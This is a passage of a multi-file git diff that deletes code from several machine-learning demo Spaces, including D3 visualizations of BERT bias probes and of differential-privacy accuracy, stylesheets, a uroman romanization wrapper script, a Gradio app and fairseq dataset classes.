d3.interpolateGreys(d/2 + 2/2) - // if (rv == 'rgb(255, 255, 255)') rv = 'rgb(254, 254, 254)' - // return rv - // } - -} -window.util = { - palette, - color: d3.interpolateSpectral, - color: palette(0, 1), -} -window.util.colors = [1 - .25, .25].map(util.color) -window.util.colors.push('#aaaa00') - -!(function(){ - var memo = {} - - util.color2array = d => { - if (memo[d]) return memo[d] - - var {r, g, b} = d3.color(d).rgb() - return memo[d] = [r, g, b].map(v => v/255) - } -})() - - -// add colors to inline elements -!(function(){ - d3.selectAll('c0').st({fontWeight: 600, color: util.colors[0]}) - d3.selectAll('c1').st({fontWeight: 600, color: util.colors[1]}) - d3.selectAll('c2').st({fontWeight: 600, color: util.colors[2]}) -})() - - - -window.pairs = [ - { - class: 'texas-ohio', - s0: 'In New York, they like to buy _.', - s1: 'In Texas, they like to buy _.', - count: 30, - annotations: [ - { - str: 'BERT associates these potential purchases more with Texas
    than New York...', - pos: [15, 15], - color: util.colors[1] - }, - { - str: '...and these purchases
    more with New York
    than Texas', - pos: [290, 305], - color: util.colors[0] - }, - ], - ariaLabel: 'Scatter plot of differences in purchases between New York and Texas. Oil, cotten and land are associated more with Texas; Pictures and perfume are more associated with New York', - alts: [ - { - str: 'Ireland v. Australia', - s1: 'We went to Ireland and bought a _.', - s0: 'We went to Australia and bought a _.', - }, - { - str: 'Arctic v. Equator', - s1: 'Near the Arctic, they like to buy _.', - s0: 'Near the equator, they like to buy _.', - }, - { - str: 'Coast v. Plains', - s1: 'On the coast, they like to buy _.', - s0: 'On the plains, they like to buy _.', - }, - { - str: 'Narnia v. Gotham', - s1: 'In Narnia, they bought a _.', - s0: 'In Gotham, they bought a _.', - }, - { - str: 'Supermarket v. Mall', - s1: 'At the supermarket, they like to buy _.', - s0: 'At the mall, they like to buy _.', - }, - // { - // str: 'Train v. Plane', - // s1: 'At the airport, they like to buy _.', - // s0: 'At the bus depot, they like to buy _.', - // }, - // { - // str: 'buy v. sell', - // s0: 'They like to buy _.', - // s1: 'We like to buy _.', - // }, - // { - // str: 'Paris v. London', - // s1: 'In Paris, they like to buy _.', - // s0: 'In London, they like to buy _.', - // }, - ] - // type: 'Differences', - }, - { - class: 'age-name', - s0: 'Elsie was born in the year of _.', - s1: 'Lauren was born in the year of _.', - count: 200, - ariaLabel: 'Scatter plot of differences in birth years between Elsie and Lauren.', - }, - { - class: 'jim-jane', - s0: 'Jim worked as a _.', - s1: 'Jane worked as a _.', - count: 30, - ariaLabel: 'Scatter plot of differences in occupations between Jim and Jane. Salesmen, carpenter and mechanic are more associated with Jim; Nurse, secretary and modal are more associated with Jane.', - }, - { - class: 'nurse-name', - s0: 'The new nurse was named _.', - s1: 'The new doctor was named _.', - count: 30, - ariaLabel: 'Scatter plot of differences in doctor and nurse names. David, Michael and himself are more associated with doctors; Jean, Sarah and Catherine are more associated with nurses.', - - }, - { - class: 'nurse-name-zari-cda', - s0: 'The new nurse was named _.', - s1: 'The new doctor was named _.', - s0: 'The doctor performed CPR even though _ knew it was too late.', - s1: 'The nurse performed CPR even though _ knew it was too late.', - s0model: '_zari_cda', - s1model: '_zari_cda', - showModel: true, - count: 30, - ariaLabel: 'Scatter plot of differences in doctor and nurse names in the Zari model. He and she are equally associated with both. But Jack, Logan and Andrew are more associated with doctors; Emily, Rachel and Amy are more associated with nurses.', - }, - { - class: 'interesting-pair', - s1: '_ flavored ice cream is tasty.', - s0: '_ flavored ice cream is revolting.', - count: 30, - alts: [ - { - str: 'Dangerous animals', - s1: '_ is a [friendly|dangerous] animal', - s0: '_ is a [friendly|dangerous] animal', - }, - ] - } -] - -pairs.forEach(d => { - d.count = d.count || 200 - d.s0model = d.s0model || '' - d.s1model = d.s1model || '' - d.annotations = d.annotations || [] - d.model = d.s0model ? 
'Zari' : 'BERT' - d.type = d.type || 'Likelihoods' - d.pairStr = JSON.stringify(d) -}) -// pairs = [window.pairs[1]] - - -var diffs = [ - { - s0: 'In [Texas|Paris], [Men|Women] like to buy _.', - s0: 'Born in [1940|2018], [his|her] name was _.', - s0: 'In [1908|2018], [he|she] was employed as a _.', - class: 'difference-difference', - count: 1000, - annotations: [], - model: 'BERT', - type: 'Likelihoods', - ariaLabel: 'Small multiple difference in difference plots.', - } -] - -diffs.forEach(d => { - d.pairStr = JSON.stringify(d) -}) - - -window.sents = [ - { - class: 'hamlet', - str: 'To be or not to be, that is the question;', - }, -] -sents.push({class: 'texas', str: pairs[0].s1.replace('_', 'things')}) -sents.push({class: 'new-york', str: pairs[0].s0.replace('_', 'things')}) - - -window.init = async function(){ - try { window.regltick.cancel() } catch (e) {} - - if (!window.tokenizer){ - window.tokenizer = new BertTokenizer() - await tokenizer.load() - } - - if (!window.bertLargeVocab){ - var text = await (await fetch('data/bert_large_vocab.txt')).text() - window.bertLargeVocab = text - .split('\n') - } - - sents.forEach(initSent) - sleep(10) - - pairs.forEach(initPair) - sleep(500) - window.initGenderOverTime() - - - // Skip rendering differene in difference until scrolled into view - var renderDiffDiff = false - var observer = new IntersectionObserver(entries => { - entries.forEach(d => { - if (renderDiffDiff || !d.isIntersecting) return - - initDiff(diffs[0]) - renderDiffDiff = true - }) - }, {}) - observer.observe(d3.select('.difference-difference').node()) - if (renderDiffDiff) initDiff(diffs[0]) - - - function sleep(ms) { - return new Promise(resolve => setTimeout(resolve, ms)) - } -} - -// Run init, rerun when width changes -!(function(){ - var lastInnerWidth = null - - function resize(){ - if (lastInnerWidth == window.innerWidth) return - lastInnerWidth = window.innerWidth - - window.init() - } - resize() - d3.select(window).on('resize', _.debounce(resize, 500)) -})() - -// Hamlet text entry -!(function(){ - var sel = d3.select('.hamlet-edit').html('') - .st({textAlign: 'center', marginTop: 17}) - .on('keydown', function(){ - sel.classed('changed', 1) - if (d3.event.keyCode != 13) return - d3.event.preventDefault() - - update() - }) - - var sent = sents[0] - - var inputSel = sel.append('textarea').at({cols: 30}) - inputSel.node().value = sent.str - - // sel.append('div') - sel.append('button.button.update').on('click', update).text('Update Sentence') - .st({width: 140, height: 47, marginLeft: 20, marginTop: 0, top: -19, marginRight: 0}) - - - function update(){ - sent.str = inputSel.node().value - - sel.classed('changed', 0) - initSent(sent) - } -})() - - -window.addLockedTooltip = function(sel){ - sel - .on('mouseover', function(d, i){ - ttSel - .html(d) - .select('.footend').remove() - - var x = this.offsetLeft, - y = this.offsetTop, - bb = ttSel.node().getBoundingClientRect(), - left = d3.clamp(20, (x-bb.width/2), window.innerWidth - bb.width - 20), - top = innerHeight + scrollY > y + 20 + bb.height ? 
y + 20 : y - bb.height - 10; - - ttSel.st({left, top}).classed('tooltip-hidden', false) - }) - - sel.on('mousemove',mouseover).on('mouseout', mouseout) - ttSel.on('mousemove', mouseover).on('mouseout', mouseout) - function mouseover(){ - if (window.__ttfade) window.__ttfade.stop() - } - function mouseout(){ - if (window.__ttfade) window.__ttfade.stop() - window.__ttfade = d3.timeout(() => { - ttSel.classed('tooltip-hidden', true) - }, 250) - } -} - -// Footnotes -!(function(){ - var footnums = '¹²³⁴⁵⁶⁷⁸⁹' - - var footendSel = d3.selectAll('.footend') - .each(function(d, i){ - var sel = d3.select(this) - var ogHTML = sel.parent().html() - sel - .at({href: '#footstart-' + i, id: 'footend-' + i}) - .text(footnums[i]) - .datum(ogHTML) - }) - - - var footstartSel = d3.selectAll('.footstart') - .each(function(d, i){ - d3.select(this) - .at({ - href: '#footend-' + i, - }) - .text(footnums[i]) - .datum(footendSel.data()[i]) - .parent().at({id: 'footstart-' + i}) - }) - .call(addLockedTooltip) - -})() - - - - - - - -// // Populate interesting alts -// !(() => { -// var listSel = d3.select('.interesting-list').st({display: 'none'}) - -// var listStr = listSel.text() - -// _.last(pairs).alts = listStr.split('-').map(d => d.trim()).filter(d => d).map(rawStr => { -// var start = rawStr.split('[')[0] -// var end = rawStr.split(']')[1] - -// var [t0, t1] = rawStr.split('[')[1].split(']')[0].split('|') -// var s0 = start + t0 + end -// var s1 = start + t1 + end - -// var str = `
    ${start} -// ${t1}|${t0} -// ${end}
    `.replace('_', '____') - -// return {str, s0, s1} -// }) -// })() - -// // Populate difference in difference -// !(() => { -// var listSel = d3.select('.difference-difference-list').st({display: 'none'}) - -// var listStr = listSel.text() - -// diffs[0].alts = listStr.split('-').map(d => d.trim()).filter(d => d).map(rawStr => { -// var start = rawStr.split('[')[0] -// var end = rawStr.split(']')[1] - -// var [t0, t1] = rawStr.split('[')[1].split(']')[0].split('|') -// var s0 = start + t0 + end -// var s1 = start + t1 + end - -// var str = `
    ${rawStr}
    `.replace('_', '____') - - -// return {str, s0, s1, rawStr} -// }) -// })() diff --git a/spaces/merve/dataset-worldviews/public/measuring-fairness/style.css b/spaces/merve/dataset-worldviews/public/measuring-fairness/style.css deleted file mode 100644 index 27a4ab72371dd17fe64ae938268ef37f7fb16247..0000000000000000000000000000000000000000 --- a/spaces/merve/dataset-worldviews/public/measuring-fairness/style.css +++ /dev/null @@ -1,274 +0,0 @@ -/* Copyright 2020 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - -@media (max-width: 925px) { - #graph > div{ - position: relative; - top: 25px; - } -} - - - -body{ - --colors-well: rgb(179, 201, 204); - --colors-sick: rgb(241, 85, 85); - --lcolors-well: rgb(217, 228, 230); - --lcolors-sick: rgb(246, 145, 145); - --dcolors-well: rgb(63, 70, 71); - --dcolors-sick: rgb(84, 30, 30); -} - - -.tooltip { - top: -1000px; - position: fixed; - padding: 10px; - background: rgba(255, 255, 255, .90); - border: 1px solid lightgray; - pointer-events: none; -} -.tooltip-hidden{ - opacity: 0; - transition: all .3s; - transition-delay: .1s; -} - -@media (max-width: 590px){ - div.tooltip{ - bottom: -1px; - width: calc(100%); - left: -1px !important; - right: -1px !important; - top: auto !important; - width: auto !important; - } -} - -svg{ - overflow: visible; -} - -.domain{ - display: none; -} - -text{ - /*pointer-events: none;*/ - /*text-shadow: 0 1px 0 #fff, 1px 0 0 #fff, 0 -1px 0 #fff, -1px 0 0 #fff;*/ -} - - - -#graph > div{ - margin-top: 20px; -} - - -#end{ - height: 600px; -} - - -.mono{ - font-family: monospace; -} - - - - -.mini .axis{ - font-size: 10px; - line-height: 12px !important; - position: relative; - top: 40px; -} - -.axis{ - font-size: 12px; -} -.axis{ - color: #999; -} -.axis text{ - fill: #999; -} -.axis line{ - stroke: #ccc; -} - -div.axis b{ - margin-bottom: -10px; - display: block; -} - -.init-hidden{ - opacity: 0; -} - - -.highlight{ - color: #fff; - padding-left: 3px; - padding-right: 3px; - padding-top: 1px; - padding-bottom: 1px; - border-radius: 3px; -} - -.highlight.grey{ background: var(--colors-well); } -.highlight.box{ - border: 1px solid #000; - border-radius: 0px; - color: #000; - padding-bottom: 2px; -} - -.weepeople { - font-family: "WeePeople"; -} - - -wee{ - font-family: "WeePeople"; - font-size: 30px; - height: 22px; - display: inline; - position: relative; - top: 5px; - color: var(--colors-well); - padding: 1px; - margin: -1px; - line-height: 3px; -} -wee.sick{ - color: var(--colors-sick); -} - -wee.bg-sick{ - background: var(--lcolors-sick); -} -wee.bg-well{ - background: var(--lcolors-well); -} - -bg{ - background: var(--lcolors-well); - padding-left: 2px; - padding-right: 2px; -} - -bg.sick{ - background: var(--lcolors-sick); -} - -wee.sick.bg-well{ - -webkit-text-stroke: .6px var(--dcolors-sick); -} -wee.well.bg-sick{ - -webkit-text-stroke: .6px var(--dcolors-well); -} - - - -.equation{ - margin: 7px; - position: relative; -} 
- - -.gated #hidden{ - visibility: hidden; -} - -.gated.opened #hidden{ - visibility: unset; -} -.gated.opened #default{ - display: none; -} - -.gated #default{ - height: 0px; -} - - - - - - - -text.weepeople{ - stroke: #000; - stroke-width: 0; - /*stroke-width: .2;*/ -} - - - - -.post-summary, .headline{ - display: none; -} - - -i{ - pointer-events: none; -} - -.slider{ - position: relative; - z-index: 100; -} - - - - - -.cursor{ - animation-duration: 1s; - animation-name: bgblink; - display: inline-block; - animation-iteration-count: infinite; - animation-direction: alternate; - cursor: pointer; - transition: opacity .5s; - stroke: #000; -} - -@keyframes bgblink { - from { - /*fill: black;*/ - stroke-width: 0px; - } - - to { - /*fill: green;*/ - stroke-width: 16px; - } -} - -.no-blink .cursor{ - /*background: rgba(255,255,0,0) !important;*/ - animation: 0; -} - - - -#adjust-text{ - padding-top: 15px; - display: block; -} diff --git a/spaces/merve/hidden-bias/source/private-and-fair/accuracy-v-privacy-dataset_size.js b/spaces/merve/hidden-bias/source/private-and-fair/accuracy-v-privacy-dataset_size.js deleted file mode 100644 index cd196da1ca712ff733e5e03de4258effba0478a3..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/source/private-and-fair/accuracy-v-privacy-dataset_size.js +++ /dev/null @@ -1,157 +0,0 @@ -!(async function(){ - var data = await util.getFile('cns-cache/model_grid_test_accuracy.json') - - data = data - .filter(d => util.epsilonExtent[1] <= d.epsilon && d.epsilon <= util.epsilonExtent[0]) - .filter(d => d.dataset_size > 1000) - - // .filter(d => d.dataset_size > 4000) - - // console.log(data) - - var bySize = d3.nestBy(data, d => d.dataset_size) - bySize.forEach((d, i) => { - d.dataset_size = d.key - - d.color = d3.interpolatePlasma(.84- i/6) - if (d.key == 60000){ - d3.selectAll('.tp60').st({background: d.color, padding: 2}) - } - if (d.key == 7500){ - d3.selectAll('.tp75').st({background: d.color, color: '#fff', padding: 2}) - } - - d.label = { - 60000: {pos: [7, 11], textAnchor: 'middle', text: '60,000'}, - 30000: {pos: [7, 11], textAnchor: 'middle', text: '30,000'}, - 15000: {pos: [7, -5], textAnchor: 'start', text: '15,000'}, - 7500: {pos: [0, 8], textAnchor: 'start', text: '7,500'}, - // 3750: {pos: [0, 14], textAnchor: 'end', text: '3,750 training points'}, - 3750: {pos: [-34, 10], textAnchor: 'start', text: '3,750'}, - 2000: {pos: [-50, 10], textAnchor: 'end', text: '2,000 training points'}, - }[d.key] - - d.forEach(e => e.size = d) - }) - - var sel = d3.select('.accuracy-v-privacy-dataset_size').html('') - .at({role: 'graphics-document', 'aria-label': `High privacy and accuracy requires more training data. 
Line chart showing too much differential privacy without enough data decreases accuracy.`}) - - sel.append('div.chart-title').text('High privacy and accuracy requires more training data') - - var c = d3.conventions({ - sel, - height: 400, - margin: {bottom: 125, top: 5}, - layers: 'sd', - }) - - c.x = d3.scaleLog().domain(util.epsilonExtent).range(c.x.range()) - c.xAxis = d3.axisBottom(c.x).tickFormat(d => { - var rv = d + '' - if (rv.split('').filter(d => d !=0 && d != '.')[0] == 1) return rv - }) - - c.yAxis.tickFormat(d => d3.format('.0%')(d))//.ticks(8) - - d3.drawAxis(c) - util.addAxisLabel(c, 'Higher Privacy →', 'Test Accuracy') - util.ggPlotBg(c, false) - c.layers[1].append('div') - .st({fontSize: 12, color: '#555', width: 120*2, textAlign: 'center', lineHeight: '1.3em'}) - .translate([c.width/2 - 120, c.height + 70]) - .html('in ε, a measure of how much modifying a single training point can change the model (models with a lower ε are more private)') - - - c.svg.selectAll('.y .tick').filter(d => d == .9) - .select('text').st({fontWeight: 600}).parent() - .append('path') - .at({stroke: '#000', strokeDasharray: '2 2', d: 'M 0 0 H ' + c.width}) - - var line = d3.line() - .x(d => c.x(d.epsilon)) - .y(d => c.y(d.accuracy)) - .curve(d3.curveMonotoneX) - - - var lineSel = c.svg.append('g').appendMany('path.accuracy-line', bySize) - .at({ - d: line, - fill: 'none', - }) - .st({ stroke: d => d.color, }) - .on('mousemove', setActiveDigit) - - var circleSel = c.svg.append('g') - .appendMany('g.accuracy-circle', data) - .translate(d => [c.x(d.epsilon), c.y(d.accuracy)]) - .on('mousemove', setActiveDigit) - // .call(d3.attachTooltip) - - circleSel.append('circle') - .at({r: 4, stroke: '#fff'}) - .st({fill: d => d.size.color }) - - - var labelSel = c.svg.appendMany('g.accuracy-label', bySize) - .translate(d => [c.x(d[0].epsilon), c.y(d[0].accuracy)]) - labelSel.append('text') - .filter(d => d.label) - .translate(d => d.label.pos) - .st({fill: d => d.color, fontWeight: 400}) - .at({textAnchor: d => d.label.textAnchor, fontSize: 14, fill: '#000', dy: '.66em'}) - .text(d => d.label.text) - .filter(d => d.key == 2000) - .text('') - .tspans(d => d.label.text.split(' ')) - - - c.svg.append('text.annotation') - .translate([225, 106]) - .tspans(d3.wordwrap('With limited data, adding more differential privacy improves accuracy...', 25), 12) - - c.svg.append('text.annotation') - .translate([490, 230]) - .tspans(d3.wordwrap(`...until it doesn't`, 20)) - - // setActiveDigit({dataset_size: 60000}) - function setActiveDigit({dataset_size}){ - lineSel - .classed('active', 0) - .filter(d => d.dataset_size == dataset_size) - .classed('active', 1) - .raise() - - circleSel - .classed('active', 0) - .filter(d => d.dataset_size == dataset_size) - .classed('active', 1) - .raise() - - labelSel - .classed('active', 0) - .filter(d => d.dataset_size == dataset_size) - .classed('active', 1) - } -})() - - - - -// aVal: 0.5 -// accuracy: 0.8936 -// accuracy_0: 0.9663265306122449 -// accuracy_1: 0.9806167400881057 -// accuracy_2: 0.9011627906976745 -// accuracy_3: 0.8633663366336634 -// accuracy_4: 0.8859470468431772 -// accuracy_5: 0.8733183856502242 -// accuracy_6: 0.9384133611691023 -// accuracy_7: 0.8657587548638133 -// accuracy_8: 0.8059548254620124 -// accuracy_9: 0.8434093161546086 -// dataset_size: 60000 -// epochs: 4 -// epsilon: 0.19034890168775565 -// l2_norm_clip: 0.75 -// noise_multiplier: 2.6 diff --git a/spaces/mikeee/radiobee-aligner/docs/build/html/_static/pygments.css 
b/spaces/mikeee/radiobee-aligner/docs/build/html/_static/pygments.css deleted file mode 100644 index be9feffb72350c3f6a6cea451ce4bd72951dff3b..0000000000000000000000000000000000000000 --- a/spaces/mikeee/radiobee-aligner/docs/build/html/_static/pygments.css +++ /dev/null @@ -1,74 +0,0 @@ -pre { line-height: 125%; margin: 0; } -td.linenos pre { color: #000000; background-color: #f0f0f0; padding: 0 5px 0 5px; } -span.linenos { color: #000000; background-color: #f0f0f0; padding: 0 5px 0 5px; } -td.linenos pre.special { color: #000000; background-color: #ffffc0; padding: 0 5px 0 5px; } -span.linenos.special { color: #000000; background-color: #ffffc0; padding: 0 5px 0 5px; } -.highlight .hll { background-color: #ffffcc } -.highlight { background: #f8f8f8; } -.highlight .c { color: #408080; font-style: italic } /* Comment */ -.highlight .err { border: 1px solid #FF0000 } /* Error */ -.highlight .k { color: #008000; font-weight: bold } /* Keyword */ -.highlight .o { color: #666666 } /* Operator */ -.highlight .ch { color: #408080; font-style: italic } /* Comment.Hashbang */ -.highlight .cm { color: #408080; font-style: italic } /* Comment.Multiline */ -.highlight .cp { color: #BC7A00 } /* Comment.Preproc */ -.highlight .cpf { color: #408080; font-style: italic } /* Comment.PreprocFile */ -.highlight .c1 { color: #408080; font-style: italic } /* Comment.Single */ -.highlight .cs { color: #408080; font-style: italic } /* Comment.Special */ -.highlight .gd { color: #A00000 } /* Generic.Deleted */ -.highlight .ge { font-style: italic } /* Generic.Emph */ -.highlight .gr { color: #FF0000 } /* Generic.Error */ -.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */ -.highlight .gi { color: #00A000 } /* Generic.Inserted */ -.highlight .go { color: #888888 } /* Generic.Output */ -.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */ -.highlight .gs { font-weight: bold } /* Generic.Strong */ -.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ -.highlight .gt { color: #0044DD } /* Generic.Traceback */ -.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */ -.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */ -.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */ -.highlight .kp { color: #008000 } /* Keyword.Pseudo */ -.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */ -.highlight .kt { color: #B00040 } /* Keyword.Type */ -.highlight .m { color: #666666 } /* Literal.Number */ -.highlight .s { color: #BA2121 } /* Literal.String */ -.highlight .na { color: #7D9029 } /* Name.Attribute */ -.highlight .nb { color: #008000 } /* Name.Builtin */ -.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */ -.highlight .no { color: #880000 } /* Name.Constant */ -.highlight .nd { color: #AA22FF } /* Name.Decorator */ -.highlight .ni { color: #999999; font-weight: bold } /* Name.Entity */ -.highlight .ne { color: #D2413A; font-weight: bold } /* Name.Exception */ -.highlight .nf { color: #0000FF } /* Name.Function */ -.highlight .nl { color: #A0A000 } /* Name.Label */ -.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */ -.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */ -.highlight .nv { color: #19177C } /* Name.Variable */ -.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */ -.highlight .w { color: #bbbbbb } /* Text.Whitespace */ -.highlight .mb { color: #666666 } /* Literal.Number.Bin */ 
-.highlight .mf { color: #666666 } /* Literal.Number.Float */ -.highlight .mh { color: #666666 } /* Literal.Number.Hex */ -.highlight .mi { color: #666666 } /* Literal.Number.Integer */ -.highlight .mo { color: #666666 } /* Literal.Number.Oct */ -.highlight .sa { color: #BA2121 } /* Literal.String.Affix */ -.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */ -.highlight .sc { color: #BA2121 } /* Literal.String.Char */ -.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */ -.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */ -.highlight .s2 { color: #BA2121 } /* Literal.String.Double */ -.highlight .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */ -.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */ -.highlight .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */ -.highlight .sx { color: #008000 } /* Literal.String.Other */ -.highlight .sr { color: #BB6688 } /* Literal.String.Regex */ -.highlight .s1 { color: #BA2121 } /* Literal.String.Single */ -.highlight .ss { color: #19177C } /* Literal.String.Symbol */ -.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */ -.highlight .fm { color: #0000FF } /* Name.Function.Magic */ -.highlight .vc { color: #19177C } /* Name.Variable.Class */ -.highlight .vg { color: #19177C } /* Name.Variable.Global */ -.highlight .vi { color: #19177C } /* Name.Variable.Instance */ -.highlight .vm { color: #19177C } /* Name.Variable.Magic */ -.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */ \ No newline at end of file diff --git a/spaces/mms-meta/MMS/uroman/bin/uroman-tsv.sh b/spaces/mms-meta/MMS/uroman/bin/uroman-tsv.sh deleted file mode 100644 index adb81f4894a0539d44ad4370eda029694211e82b..0000000000000000000000000000000000000000 --- a/spaces/mms-meta/MMS/uroman/bin/uroman-tsv.sh +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env bash -# Created by Thamme Gowda on June 17, 2019 - -DIR=$(dirname "${BASH_SOURCE[0]}") # get the directory name -# DIR=$(realpath "${DIR}") # resolve its full path if need be - -if [[ $# -lt 1 || $# -gt 2 ]]; then - >&2 echo "ERROR: invalid args" - >&2 echo "Usage: []" - exit 2 -fi - -INP=$1 -OUT=$2 - -CMD=$DIR/uroman.pl - -function romanize(){ - paste <(cut -f1 $INP) <(cut -f2 $INP | $CMD) -} - -if [[ -n $OUT ]]; then - romanize > $OUT -else - romanize -fi - - diff --git a/spaces/montagekoko/anything-v3.0/app.py b/spaces/montagekoko/anything-v3.0/app.py deleted file mode 100644 index 99a6a3762d5e337f08e960c4a31b4ac2467bca49..0000000000000000000000000000000000000000 --- a/spaces/montagekoko/anything-v3.0/app.py +++ /dev/null @@ -1,8 +0,0 @@ -import gradio as gr - -description = """
    - -
    - """ - -gr.Interface.load("models/Linaqruf/anything-v3.0", description=description).launch() \ No newline at end of file diff --git a/spaces/mshkdm/VToonify/vtoonify/model/stylegan/op/__init__.py b/spaces/mshkdm/VToonify/vtoonify/model/stylegan/op/__init__.py deleted file mode 100644 index d0918d92285955855be89f00096b888ee5597ce3..0000000000000000000000000000000000000000 --- a/spaces/mshkdm/VToonify/vtoonify/model/stylegan/op/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from .fused_act import FusedLeakyReLU, fused_leaky_relu -from .upfirdn2d import upfirdn2d diff --git a/spaces/mshukor/UnIVAL/data/ofa_dataset.py b/spaces/mshukor/UnIVAL/data/ofa_dataset.py deleted file mode 100644 index fa30b24c858bb36da1179a53aef717b54d6b22f3..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/data/ofa_dataset.py +++ /dev/null @@ -1,79 +0,0 @@ -# Copyright 2022 The OFA-Sys Team. -# All rights reserved. -# This source code is licensed under the Apache 2.0 license -# found in the LICENSE file in the root directory. - -import logging -import re -import torch.utils.data -from fairseq.data import FairseqDataset - -logger = logging.getLogger(__name__) - - -class OFADataset(FairseqDataset): - def __init__(self, split, dataset, bpe, src_dict, tgt_dict): - self.split = split - self.dataset = dataset - self.bpe = bpe - self.src_dict = src_dict - self.tgt_dict = tgt_dict - - self.bos = src_dict.bos() - self.eos = src_dict.eos() - self.pad = src_dict.pad() - self.bos_item = torch.LongTensor([self.bos]) - self.eos_item = torch.LongTensor([self.eos]) - - def __len__(self): - return len(self.dataset) - - def encode_text(self, text, length=None, append_bos=False, append_eos=False, use_bpe=True): - s = self.tgt_dict.encode_line( - line=self.bpe.encode(text) if use_bpe else text, - add_if_not_exist=False, - append_eos=False - ).long() - if length is not None: - s = s[:length] - if append_bos: - s = torch.cat([self.bos_item, s]) - if append_eos: - s = torch.cat([s, self.eos_item]) - return s - - def pre_question(self, question, max_ques_words=None): - question = question.lower().lstrip(",.!?*#:;~").replace('-', ' ').replace('/', ' ') - - question = re.sub( - r"\s{2,}", - ' ', - question, - ) - question = question.rstrip('\n') - question = question.strip(' ') - - # truncate question - question_words = question.split(' ') - if max_ques_words is not None and len(question_words) > max_ques_words: - question = ' '.join(question_words[:max_ques_words]) - - return question - - def pre_caption(self, caption, max_words=None): - caption = caption.lower().lstrip(",.!?*#:;~").replace('-', ' ').replace('/', ' ').replace('', 'person') - - caption = re.sub( - r"\s{2,}", - ' ', - caption, - ) - caption = caption.rstrip('\n') - caption = caption.strip(' ') - - # truncate caption - caption_words = caption.split(' ') - if max_words is not None and len(caption_words) > max_words: - caption = ' '.join(caption_words[:max_words]) - - return caption diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/speech_recognition/data/asr_dataset.py b/spaces/mshukor/UnIVAL/fairseq/examples/speech_recognition/data/asr_dataset.py deleted file mode 100644 index 63a6fcac85d73b1fce8e4d044b4209b1b67fa8ce..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/speech_recognition/data/asr_dataset.py +++ /dev/null @@ -1,122 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import os - -import numpy as np -from fairseq.data import FairseqDataset - -from . import data_utils -from .collaters import Seq2SeqCollater - - -class AsrDataset(FairseqDataset): - """ - A dataset representing speech and corresponding transcription. - - Args: - aud_paths: (List[str]): A list of str with paths to audio files. - aud_durations_ms (List[int]): A list of int containing the durations of - audio files. - tgt (List[torch.LongTensor]): A list of LongTensors containing the indices - of target transcriptions. - tgt_dict (~fairseq.data.Dictionary): target vocabulary. - ids (List[str]): A list of utterance IDs. - speakers (List[str]): A list of speakers corresponding to utterances. - num_mel_bins (int): Number of triangular mel-frequency bins (default: 80) - frame_length (float): Frame length in milliseconds (default: 25.0) - frame_shift (float): Frame shift in milliseconds (default: 10.0) - """ - - def __init__( - self, - aud_paths, - aud_durations_ms, - tgt, - tgt_dict, - ids, - speakers, - num_mel_bins=80, - frame_length=25.0, - frame_shift=10.0, - ): - assert frame_length > 0 - assert frame_shift > 0 - assert all(x > frame_length for x in aud_durations_ms) - self.frame_sizes = [ - int(1 + (d - frame_length) / frame_shift) for d in aud_durations_ms - ] - - assert len(aud_paths) > 0 - assert len(aud_paths) == len(aud_durations_ms) - assert len(aud_paths) == len(tgt) - assert len(aud_paths) == len(ids) - assert len(aud_paths) == len(speakers) - self.aud_paths = aud_paths - self.tgt_dict = tgt_dict - self.tgt = tgt - self.ids = ids - self.speakers = speakers - self.num_mel_bins = num_mel_bins - self.frame_length = frame_length - self.frame_shift = frame_shift - - self.s2s_collater = Seq2SeqCollater( - 0, - 1, - pad_index=self.tgt_dict.pad(), - eos_index=self.tgt_dict.eos(), - move_eos_to_beginning=True, - ) - - def __getitem__(self, index): - import torchaudio - import torchaudio.compliance.kaldi as kaldi - - tgt_item = self.tgt[index] if self.tgt is not None else None - - path = self.aud_paths[index] - if not os.path.exists(path): - raise FileNotFoundError("Audio file not found: {}".format(path)) - sound, sample_rate = torchaudio.load_wav(path) - output = kaldi.fbank( - sound, - num_mel_bins=self.num_mel_bins, - frame_length=self.frame_length, - frame_shift=self.frame_shift, - ) - output_cmvn = data_utils.apply_mv_norm(output) - - return {"id": index, "data": [output_cmvn.detach(), tgt_item]} - - def __len__(self): - return len(self.aud_paths) - - def collater(self, samples): - """Merge a list of samples to form a mini-batch. - - Args: - samples (List[int]): sample indices to collate - - Returns: - dict: a mini-batch suitable for forwarding with a Model - """ - return self.s2s_collater.collate(samples) - - def num_tokens(self, index): - return self.frame_sizes[index] - - def size(self, index): - """Return an example's size as a float or tuple. This value is used when - filtering a dataset with ``--max-positions``.""" - return ( - self.frame_sizes[index], - len(self.tgt[index]) if self.tgt is not None else 